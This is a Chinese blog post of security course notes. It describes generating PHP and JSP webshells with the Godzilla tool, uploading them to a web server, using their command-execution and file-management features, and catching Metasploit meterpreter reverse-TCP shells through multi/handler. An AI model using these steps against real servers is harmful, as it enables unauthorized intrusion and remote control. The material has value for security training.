NSATP-A学习笔记之Day2-2使用教程

Posted 火星上烤鱼

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了NSATP-A学习笔记之Day2-2使用教程相关的知识,希望对你有一定的参考价值。

上传php木马进行管理(godzila)

第一步 点击管理–>生成–>payload

第二步 生成shell

密码:可以自行定义
密码:可以自行定义
有效载荷:
* JavaDynamicPayload
* CShapDynamicPayload
* PhpDynamicPayload
加密器:
* JAVA_AES_BASE64
* JAVA_AES_RAW


第三步 马上传到服务器


第三步 哥斯拉连接




第四步 使用功能-基础信息

第五步 使用功能-命令执行

第六步 使用功能-文件管理

第五七步 于msf联动

在kaili中生成payload,在特斯拉进行监听回弹

kali中
msfconsole
use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set lhost 
set lport 
run -j -z 
pmeterpreter-host-172.161.11.2 port-4444


哥斯拉

load
go 

kali中的MSF管理shell

job 查看后台任务
job -k id
seesions 查看存在的会话
sessions -i id 进入指定id的会话


上传jsp木马进行管理(godzila)

第一步 godzila生成jsp木马




第二步 网站上传jsp木马

第三步 godzila进行连接


第四步 命令执行

第五步 文件管理

第六步 屏幕截屏


第七步 与MSF联动

kali中
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 
set lport 
run -j -z 
Jmeterpreter-host-172.161.11.2 port-4444



免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果上传者概不负责!

以上是关于NSATP-A学习笔记之Day2-2使用教程的主要内容,如果未能解决你的问题,请参考以下文章

NSATP-A学习笔记之Day2-6hydra爆破

NSATP-A学习笔记之Day1

NSATP-A学习笔记之Day2-3burp使用

NSATP-A学习笔记之Day3-1nmap使用

NSATP-A学习笔记之Day3-5sqlmap-参数使用

NSATP-A学习笔记之Day2-4密码字典生成